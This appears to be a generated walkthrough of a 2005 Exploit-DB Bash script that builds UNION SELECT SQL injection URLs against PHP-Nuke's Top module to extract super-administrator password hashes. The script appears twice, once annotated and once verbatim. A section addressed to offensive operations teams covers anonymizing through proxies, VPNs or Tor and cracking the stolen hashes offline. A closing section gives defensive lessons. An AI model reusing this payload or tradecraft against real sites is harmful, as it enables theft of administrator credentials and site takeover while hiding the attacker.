Exploiting PHP-Nuke's Top Module for SQL Injection

What this paper is

This paper details a SQL injection vulnerability in the "Top module" of PHP-Nuke versions 6.x up to 7.6. The vulnerability allows an attacker to extract sensitive information, specifically the password hashes of administrators with super privileges, by manipulating the querylang parameter in the modules.php script.

Simple technical breakdown

The core of the vulnerability lies in how the PHP-Nuke Top module handles user input for the querylang parameter. When this parameter is not properly sanitized, an attacker can inject SQL commands. The exploit uses a UNION SELECT statement to combine the results of the attacker's query with the legitimate query that the module would normally execute. By carefully crafting the UNION SELECT statement, the attacker can retrieve data from other tables, in this case, the nuke_authors table to get the pwd (password hash) of super administrators.

Complete code and payload walkthrough

The provided code is a simple Bash script designed to automate the exploitation process.

#!/bin/bash

# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke

#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!  
#

URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

        echo -e "\n PHPNuke Top Module Remote SQL Injection" 
        echo -e " by Fabrizi Andrea 2005"

if [ "$URL" = "" ]; then
	echo -e "\n USAGE: $0 [URL] [NukePath]"
	echo -e " Example: $0 www.site.net phpNuke\n" 
	exit
fi;

if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"

# milw0rm.com [2005-04-07]

Code Fragment/Block -> Practical Purpose Mapping:

• #!/bin/bash: Shebang line, indicates the script should be executed with Bash.
• # This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1: A comment providing a direct example of the crafted URL.
• # PHPNuke Top Module Remote SQL Injection: Header comment indicating the script's purpose and author.
• URL=$1;: Assigns the first command-line argument (the target URL) to the URL variable.
• PATH="$2/";: Assigns the second command-line argument (the path to the PHP-Nuke installation) to the PATH variable.
• ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";: Defines the URL for an anonymizing proxy service, which can be used to mask the attacker's IP address.
• echo -e "\n PHPNuke Top Module Remote SQL Injection" and echo -e " by Fabrizi Andrea 2005": Prints introductory messages to the console.
• if [ "$URL" = "" ]; then ... exit fi;: Checks if the URL argument is provided. If not, it prints usage instructions and exits.
• if [ $PATH = "/" ]; then PATH=""; fi;: If the provided path is just a root slash, it's normalized to an empty string to avoid double slashes in the final URL.
• anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";: Constructs the full URL for the attack, using the anonymizing proxy.
  • $ANON: The anonymizer URL.
  • http://$URL/$PATH: The target website and its PHP-Nuke installation path.
  • modules.php?name=Top: The vulnerable script and module.
  • &querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1: This is the core of the SQL injection payload.
    • union: Combines the results of two SELECT statements.
    • %20: URL-encoded space.
    • select 0,pwd,0,0: Selects four columns. The pwd column will contain the password hash. The 0s are placeholders to match the number of columns expected by the original query. The exact number of columns needed would depend on the original query executed by the modules.php?name=Top script. This exploit assumes the original query returns at least 4 columns.
    • from nuke_authors: Specifies the table to query.
    • where radminsuper=1: Filters the results to only include rows where the radminsuper column is set to 1, which typically identifies super administrators.
• query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";: Constructs the direct attack URL without using the anonymizing proxy.
• echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";: Prints the constructed anonymous query URL.
• echo -e " - Direct Query URL: " $query_url "\n";: Prints the constructed direct query URL.
• echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n": Informs the user where to look for the extracted password hashes (in the output of the "Most voted polls" list, which is what the Top module likely displays).
• # milw0rm.com [2005-04-07]: A comment indicating the source and publication date of the exploit.

Payload Explanation:

The core payload is the querylang parameter's value: union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1.

• union: This SQL keyword is used to combine the result set of two or more SELECT statements. The number and order of columns in the SELECT statements must be the same.
• %20: This is the URL-encoded representation of a space character. It's used to ensure the SQL query is correctly interpreted by the web server and database.
• select 0,pwd,0,0: This part of the injected query attempts to select four columns.
  • 0: These are literal values. They are used as placeholders to match the expected number of columns from the original query that the modules.php?name=Top script would normally execute. If the original query returned, say, 4 columns, the UNION SELECT must also return 4 columns.
  • pwd: This is the crucial part. It attempts to retrieve the password hash from the nuke_authors table.
• from nuke_authors: This specifies that the data should be retrieved from the nuke_authors table, which is where user information, including administrator credentials, is typically stored in PHP-Nuke.
• where radminsuper=1: This condition filters the results to only return rows where the radminsuper column is equal to 1. In PHP-Nuke, a radminsuper value of 1 usually signifies a super administrator account.

When this crafted URL is accessed, the PHP-Nuke script will execute its original query for the Top module. Then, it will execute the injected UNION SELECT query. The results of both queries will be combined. If the injection is successful, the pwd column from the nuke_authors table for super administrators will be appended to the output that the Top module normally displays. The attacker would then parse this output to find the password hashes.

Practical details for offensive operations teams

• Required Access Level: No authenticated access is required. This is a remote, unauthenticated vulnerability.
• Lab Preconditions:
  • A target PHP-Nuke installation (v6.x to 7.6) must be accessible over the network.
  • The "Top module" must be enabled and accessible.
  • A vulnerable version of PHP-Nuke is required.
  • Network connectivity to the target.
• Tooling Assumptions:
  • A Bash-compatible shell environment (Linux, macOS, or Windows Subsystem for Linux).
  • curl or a similar HTTP client is implicitly used by the script's logic (though not directly called, the URLs are meant to be browsed).
  • The anonymizing proxy anonymouse.ws must be operational and accessible.
• Execution Pitfalls:
  • Incorrect Path: If the PATH argument is incorrect, the script will generate invalid URLs.
  • WAF/IPS: Modern Web Application Firewalls (WAFs) or Intrusion Prevention Systems (IPS) may detect and block the SQL injection pattern, especially the UNION SELECT syntax.
  • Database Schema Variations: While the paper assumes a nuke_authors table with pwd and radminsuper columns, older or modified versions might have different table/column names, rendering the exploit ineffective.
  • Output Parsing: The script only generates the URL. The operator needs to manually fetch the URL and parse the output to extract the password hashes. The output format might vary, and the hashes could be mixed with legitimate content.
  • Anonymizer Availability: The anonymouse.ws proxy might be down or rate-limited.
  • Number of Columns Mismatch: The exploit assumes the original query for the Top module returns exactly 4 columns. If it returns more or fewer, the UNION SELECT will fail. The 0,pwd,0,0 part might need adjustment.
• Tradecraft Considerations:
  • Reconnaissance: Confirm the PHP-Nuke version and the presence of the Top module. Look for common PHP-Nuke installation paths.
  • Anonymization: Using the ANON proxy is a basic form of anonymization. For more robust operations, consider using VPNs, Tor, or dedicated proxy chains.
  • Payload Delivery: The script generates URLs. These can be manually visited, or a more automated approach using curl could be scripted to fetch the URLs and process the output.
  • Post-Exploitation: Extracted password hashes can be used for offline cracking attempts.

Where this was used and when

• Context: This vulnerability was relevant for compromising PHP-Nuke websites, a popular content management system in the early to mid-2000s. Attackers would use this to gain access to administrator accounts, which could then be used to deface websites, spread malware, or pivot to other systems.
• Approximate Years: The exploit was published in 2005. PHP-Nuke versions 6.x and 7.x were prevalent around this time. Therefore, this vulnerability would have been actively exploited from its discovery until PHP-Nuke versions 7.6 and earlier were phased out or patched.

Defensive lessons for modern teams

• Input Validation and Sanitization: This is the most critical lesson. All user-supplied input, especially data that is incorporated into SQL queries, must be rigorously validated and sanitized to prevent injection attacks. Using parameterized queries or prepared statements is the standard defense.
• Web Application Firewalls (WAFs): While not a complete solution, WAFs can provide a layer of defense by detecting and blocking common SQL injection patterns. However, attackers can often bypass simple WAF rules with obfuscation.
• Regular Patching and Updates: Keeping web applications and their underlying frameworks (like PHP-Nuke in this case) up-to-date with the latest security patches is paramount. Vulnerabilities like this are typically fixed in later versions.
• Least Privilege Principle: Database users should operate with the minimum necessary privileges. The web application's database user should not have broad administrative rights.
• Security Audits and Code Reviews: Regularly auditing web application code for common vulnerabilities like SQL injection is essential.
• Monitoring and Logging: Implement robust logging for web server and application activity. Monitor logs for suspicious requests or patterns that might indicate an attempted or successful injection attack.

ASCII visual (if applicable)

+-----------------+      +-----------------+      +-----------------+
| Attacker's       |----->| Anonymizing     |----->| Target PHP-Nuke |
| Machine         |      | Proxy (Optional)|      | Web Server      |
+-----------------+      +-----------------+      +-----------------+
                                                         |
                                                         | modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
                                                         v
                                                 +-----------------+
                                                 | PHP Application |
                                                 | (Vulnerable)    |
                                                 +-----------------+
                                                         |
                                                         | Executes original query + UNION SELECT
                                                         v
                                                 +-----------------+
                                                 | Database Server |
                                                 | (MySQL/etc.)    |
                                                 +-----------------+
                                                         |
                                                         | Returns:
                                                         | - Original Module Data
                                                         | - Extracted pwd hashes
                                                         v
                                                 +-----------------+
                                                 | PHP Application |
                                                 | (Output to user)|
                                                 +-----------------+

This diagram illustrates the flow of the attack. The attacker crafts a malicious URL, which can optionally be sent through an anonymizing proxy. This URL is sent to the target web server, where the PHP application processes it. The vulnerable script then executes the injected SQL query against the database. The database returns the combined results, including the extracted password hashes, which are then displayed by the PHP application.

Source references

• Paper ID: 921
• Paper Title: PHP-Nuke 6.x < 7.6 Top module - SQL Injection
• Author: Fabrizi Andrea
• Published: 2005-04-07
• Keywords: PHP, webapps
• Paper URL: https://www.exploit-db.com/papers/921
• Raw Exploit URL: https://www.exploit-db.com/raw/921

Original Exploit-DB Content (Verbatim)

#/bin/bash

# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke

#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!  
#

URL=$1;
PATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

        echo -e "\n PHPNuke Top Module Remote SQL Injection" 
        echo -e " by Fabrizi Andrea 2005"

if [ "$URL" = "" ]; then
	echo -e "\n USAGE: $0 [URL] [NukePath]"
	echo -e " Example: $0 www.site.net phpNuke\n" 
	exit
fi;

if [ $PATH = "/" ]; then PATH=""; fi;
#anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

#query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$PATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vurnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"

# milw0rm.com [2005-04-07]